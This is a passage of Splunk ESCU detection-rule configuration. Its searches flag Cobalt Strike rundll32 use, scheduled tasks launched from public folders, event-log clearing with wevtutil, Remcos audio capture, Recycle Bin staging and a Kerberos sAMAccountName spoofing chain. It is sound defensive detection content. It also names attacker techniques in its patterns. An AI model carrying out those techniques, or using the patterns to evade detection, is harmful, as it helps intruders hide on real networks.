Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may use Start as a function and call it via the command line. Filter as needed. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Rundll32 StartW - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trickbot", "Suspicious Rundll32 Activity", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = rundll32.exe running with suspicious StartW parameters on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Rundll32 StartW - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot", "Suspicious Rundll32 Activity", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies rundll32.exe executing a DLL function name, Start and StartW, on the command line that is commonly observed with Cobalt Strike x86 and x64 DLL payloads. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. Typically, the DLL will be written and loaded from a world writeable path or user location. In most instances it will not have a valid certificate (Unsigned). During investigation, review the parent process and other parallel application execution. Capture and triage the DLL in question. In the instance of Cobalt Strike, rundll32.exe is the default process it opens and injects shellcode into. This default process can be changed, but typically is not. action.notable.param.rule_title = Suspicious Rundll32 StartW action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*start* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_rundll32_startw_filter` [ESCU - Suspicious Scheduled Task from Public Directory - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic, "Suspicious Scheduled Task from Public Directory", detects the registration of scheduled tasks aimed to execute a binary or script from public directories, a behavior often associated with malware deployment. It utilizes the Sysmon Event ID 1 data source, searching for instances where schtasks.exe is connected with the directories users\public, \programdata\, or \windows\temp and involves the /create command.\ The registration of such scheduled tasks in public directories could suggest that an attacker is trying to maintain persistence or execute malicious scripts. If confirmed as a true positive, this could lead to data compromise, unauthorized access, and potential lateral movement within the network. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic, "Suspicious Scheduled Task from Public Directory", detects the registration of scheduled tasks aimed to execute a binary or script from public directories, a behavior often associated with malware deployment. It utilizes the Sysmon Event ID 1 data source, searching for instances where schtasks.exe is connected with the directories users\public, \programdata\, or \windows\temp and involves the /create command.\ The registration of such scheduled tasks in public directories could suggest that an attacker is trying to maintain persistence or execute malicious scripts. If confirmed as a true positive, this could lead to data compromise, unauthorized access, and potential lateral movement within the network. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = The main source of false positives could be the legitimate use of scheduled tasks from these directories. Careful tuning of this search may be necessary to suit the specifics of your environment, reducing the rate of false positives. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Scheduled Task from Public Directory - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Azorult", "Ryuk Ransomware", "Scheduled Tasks", "Ransomware", "Windows Persistence Techniques", "Living Off The Land", "DarkCrystal RAT", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = Suspicious scheduled task registered on $dest$ from Public Directory action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Scheduled Task from Public Directory - Rule action.correlationsearch.annotations = {"analytic_story": ["Azorult", "Ryuk Ransomware", "Scheduled Tasks", "Ransomware", "Windows Persistence Techniques", "Living Off The Land", "DarkCrystal RAT", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe (Processes.process=*\\users\\public\\* OR Processes.process=*\\programdata\\* OR Processes.process=*windows\\temp*) Processes.process=*/create* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `suspicious_scheduled_task_from_public_directory_filter` [ESCU - Suspicious SearchProtocolHost no Command Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies searchprotocolhost.exe with no command line arguments. It is unusual for searchprotocolhost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. searchprotocolhost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies searchprotocolhost.exe with no command line arguments. It is unusual for searchprotocolhost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. searchprotocolhost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives may be present in small environments. Tuning may be required based on parent process. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious SearchProtocolHost no Command Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = Suspicious searchprotocolhost.exe process with no command line arguments executed on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious SearchProtocolHost no Command Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies searchprotocolhost.exe with no command line arguments. It is unusual for searchprotocolhost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. searchprotocolhost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = Suspicious SearchProtocolHost no Command Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=searchprotocolhost.exe by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(searchprotocolhost\.exe.{0,4}$)" | `suspicious_searchprotocolhost_no_command_line_arguments_filter` [ESCU - Suspicious SQLite3 LSQuarantine Behavior - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic identifies the use of a SQLite3 querying the MacOS preferences to identify the original URL the pkg was downloaded from. This particular behavior is common with MacOS adware-malicious software. Upon triage, review other processes in parallel for suspicious activity. Identify any recent package installations. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1074"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of a SQLite3 querying the MacOS preferences to identify the original URL the pkg was downloaded from. This particular behavior is common with MacOS adware-malicious software. Upon triage, review other processes in parallel for suspicious activity. Identify any recent package installations. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. action.escu.creation_date = 2021-02-22 action.escu.modification_date = 2021-02-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious SQLite3 LSQuarantine Behavior - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Silver Sparrow"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Suspicious SQLite3 LSQuarantine Behavior - Rule action.correlationsearch.annotations = {"analytic_story": ["Silver Sparrow"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1074"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of a SQLite3 querying the MacOS preferences to identify the original URL the pkg was downloaded from. This particular behavior is common with MacOS adware-malicious software. Upon triage, review other processes in parallel for suspicious activity. Identify any recent package installations. action.notable.param.rule_title = Suspicious SQLite3 LSQuarantine Behavior action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=sqlite3 Processes.process=*LSQuarantine* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `suspicious_sqlite3_lsquarantine_behavior_filter` [ESCU - Suspicious Ticket Granting Ticket Request - Rule] action.escu = 0 action.escu.enabled = 1 description = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries will need to request a Kerberos Ticket Granting Ticket (TGT) on behalf of the newly created and renamed computer account. The TGT request will be preceded by a computer account name event. This analytic leverages Event Id 4781, `The name of an account was changed` and event Id 4768 `A Kerberos authentication ticket (TGT) was requested` to correlate a sequence of events where the new computer account on event id 4781 matches the request account on event id 4768. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries will need to request a Kerberos Ticket Granting Ticket (TGT) on behalf of the newly created and renamed computer account. The TGT request will be preceded by a computer account name event. This analytic leverages Event Id 4781, `The name of an account was changed` and event Id 4768 `A Kerberos authentication ticket (TGT) was requested` to correlate a sequence of events where the new computer account on event id 4781 matches the request account on event id 4768. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. The Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon` needs to be enabled. action.escu.known_false_positives = A computer account name change event inmediately followed by a kerberos TGT request with matching fields is unsual. However, legitimate behavior may trigger it. Filter as needed. action.escu.creation_date = 2021-12-21 action.escu.modification_date = 2021-12-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Ticket Granting Ticket Request - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["sAMAccountName Spoofing and Domain Controller Impersonation", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Ticket Granting Ticket Request - Rule action.correlationsearch.annotations = {"analytic_story": ["sAMAccountName Spoofing and Domain Controller Impersonation", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 60, "impact": 100, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` (EventCode=4781 Old_Account_Name="*$" New_Account_Name!="*$") OR (EventCode=4768 Account_Name!="*$") | eval RenamedComputerAccount = coalesce(New_Account_Name, mvindex(Account_Name,0)) | transaction RenamedComputerAccount startswith=(EventCode=4781) endswith=(EventCode=4768) | eval short_lived=case((duration<2),"TRUE") | search short_lived = TRUE | table _time, ComputerName, EventCode, Account_Name,RenamedComputerAccount, short_lived |`suspicious_ticket_granting_ticket_request_filter` [ESCU - Suspicious WAV file in Appdata Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious creation of .wav file in appdata folder. This behavior was seen in Remcos RAT malware where it put the audio recording in the appdata\audio folde as part of data collection. this recording can be send to its C2 server as part of its exfiltration to the compromised machine. creation of wav files in this folder path is not a ussual disk place used by user to save audio format file. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1113"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a suspicious creation of .wav file in appdata folder. This behavior was seen in Remcos RAT malware where it put the audio recording in the appdata\audio folde as part of data collection. this recording can be send to its C2 server as part of its exfiltration to the compromised machine. creation of wav files in this folder path is not a ussual disk place used by user to save audio format file. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, file_name, file_path and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-07-07 action.escu.modification_date = 2022-07-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious WAV file in Appdata Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Remcos"] action.risk = 1 action.risk.param._risk_message = process $process_name$ creating image file $file_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious WAV file in Appdata Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["Remcos"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1113"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a suspicious creation of .wav file in appdata folder. This behavior was seen in Remcos RAT malware where it put the audio recording in the appdata\audio folde as part of data collection. this recording can be send to its C2 server as part of its exfiltration to the compromised machine. creation of wav files in this folder path is not a ussual disk place used by user to save audio format file. action.notable.param.rule_title = Suspicious WAV file in Appdata Folder action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=*.exe Processes.process_path="*\\appdata\\Roaming\\*" by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest Processes.process_guid | `drop_dm_object_name(Processes)` |rename process_guid as proc_guid | join proc_guid, _time [ | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*.wav") Filesystem.file_path = "*\\appdata\\Roaming\\*" by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid | `drop_dm_object_name(Filesystem)` |rename process_guid as proc_guid | fields file_name file_path process_name process_path process dest file_create_time _time proc_guid] | `suspicious_wav_file_in_appdata_folder_filter` [ESCU - Suspicious wevtutil Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The wevtutil.exe application is the windows event log utility. This searches for wevtutil.exe with parameters for clearing the application, security, setup, trace or system event logs. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.001", "T1070"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The wevtutil.exe application is the windows event log utility. This searches for wevtutil.exe with parameters for clearing the application, security, setup, trace or system event logs. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = The wevtutil.exe application is a legitimate Windows event log utility. Administrators may use it to manage Windows event logs. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious wevtutil Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Log Manipulation", "Ransomware", "Rhysida Ransomware", "Clop Ransomware", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = Wevtutil.exe being used to clear Event Logs on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 28}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 28}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious wevtutil Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Log Manipulation", "Ransomware", "Rhysida Ransomware", "Clop Ransomware", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 70, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.001", "T1070"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The wevtutil.exe application is the windows event log utility. This searches for wevtutil.exe with parameters for clearing the application, security, setup, trace or system event logs. action.notable.param.rule_title = Suspicious wevtutil Usage action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=wevtutil.exe Processes.process IN ("* cl *", "*clear-log*") (Processes.process="*System*" OR Processes.process="*Security*" OR Processes.process="*Setup*" OR Processes.process="*Application*" OR Processes.process="*trace*") by Processes.process_name Processes.parent_process_name Processes.dest Processes.user| `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `suspicious_wevtutil_usage_filter` [ESCU - Suspicious writes to windows Recycle Bin - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects when a process other than explorer.exe writes to the Windows Recycle Bin to detect potential threats earlier and mitigate the risks. This detection is made by a Splunk query that utilizes the Endpoint.Filesystem data model and the Endpoint.Processes data model. The query looks for any process writing to the "*$Recycle.Bin*" file path, excluding explorer.exe. This detection is important because it suggests that an attacker is attempting to hide their activities by using the Recycle Bin, which can lead to data theft, ransomware, or other damaging outcomes. Detecting writes to the Recycle Bin by a process other than explorer.exe can help to investigate and determine if the activity is malicious or benign. False positives might occur since there might be legitimate uses of the Recycle Bin by processes other than explorer.exe. Next steps include reviewing the process writing to the Recycle Bin and any relevant on-disk artifacts upon triage. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects when a process other than explorer.exe writes to the Windows Recycle Bin to detect potential threats earlier and mitigate the risks. This detection is made by a Splunk query that utilizes the Endpoint.Filesystem data model and the Endpoint.Processes data model. The query looks for any process writing to the "*$Recycle.Bin*" file path, excluding explorer.exe. This detection is important because it suggests that an attacker is attempting to hide their activities by using the Recycle Bin, which can lead to data theft, ransomware, or other damaging outcomes. Detecting writes to the Recycle Bin by a process other than explorer.exe can help to investigate and determine if the activity is malicious or benign. False positives might occur since there might be legitimate uses of the Recycle Bin by processes other than explorer.exe. Next steps include reviewing the process writing to the Recycle Bin and any relevant on-disk artifacts upon triage. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on filesystem and process logs responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` and `Filesystem` nodes. action.escu.known_false_positives = Because the Recycle Bin is a hidden folder in modern versions of Windows, it would be unusual for a process other than explorer.exe to write to it. Incidents should be investigated as appropriate. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious writes to windows Recycle Bin - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Collection and Staging", "PlugX"] action.risk = 1 action.risk.param._risk_message = Suspicious writes to windows Recycle Bin process $process_name$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 28}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious writes to windows Recycle Bin - Rule action.correlationsearch.annotations = {"analytic_story": ["Collection and Staging", "PlugX"], "cis20": ["CIS 10"], "confidence": 70, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects when a process other than explorer.exe writes to the Windows Recycle Bin to detect potential threats earlier and mitigate the risks. This detection is made by a Splunk query that utilizes the Endpoint.Filesystem data model and the Endpoint.Processes data model. The query looks for any process writing to the "*$Recycle.Bin*" file path, excluding explorer.exe. This detection is important because it suggests that an attacker is attempting to hide their activities by using the Recycle Bin, which can lead to data theft, ransomware, or other damaging outcomes. Detecting writes to the Recycle Bin by a process other than explorer.exe can help to investigate and determine if the activity is malicious or benign. False positives might occur since there might be legitimate uses of the Recycle Bin by processes other than explorer.exe. Next steps include reviewing the process writing to the Recycle Bin and any relevant on-disk artifacts upon triage. action.notable.param.rule_title = Suspicious writes to windows Recycle Bin action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.file_path) as file_path values(Filesystem.file_name) as file_name FROM datamodel=Endpoint.Filesystem where Filesystem.file_path = "*$Recycle.Bin*" by Filesystem.process_name Filesystem.process_id Filesystem.dest | `drop_dm_object_name("Filesystem")` | join process_id [| tstats `security_content_summariesonly` values(Processes.user) as user values(Processes.process_name) as process_name values(Processes.parent_process_name) as parent_process_name FROM datamodel=Endpoint.Processes where Processes.process_name != "explorer.exe" by Processes.process_id Processes.dest | `drop_dm_object_name("Processes")` | table user process_name process_id dest] | `suspicious_writes_to_windows_recycle_bin_filter` [ESCU - Svchost LOLBAS Execution Process Spawn - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is designed to spot instances of 'svchost.exe' initiating a Living Off The Land Binaries and Scripts (LOLBAS) execution process. Often, adversaries manipulate Task Scheduler to execute code on remote endpoints, resulting in the spawning of a malicious command as a child process of 'svchost.exe'. By tracking child processes of 'svchost.exe' that align with the LOLBAS project, potential lateral movement activity can be detected. The analytic examines process details, including the process name, parent process, and command-line executions. A comprehensive list of LOLBAS processes is included in the search parameters. Although the analytic might catch legitimate applications exhibiting this behavior, these instances should be filtered accordingly. The findings from this analytic offer valuable insight into potentially malicious activities on an endpoint. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 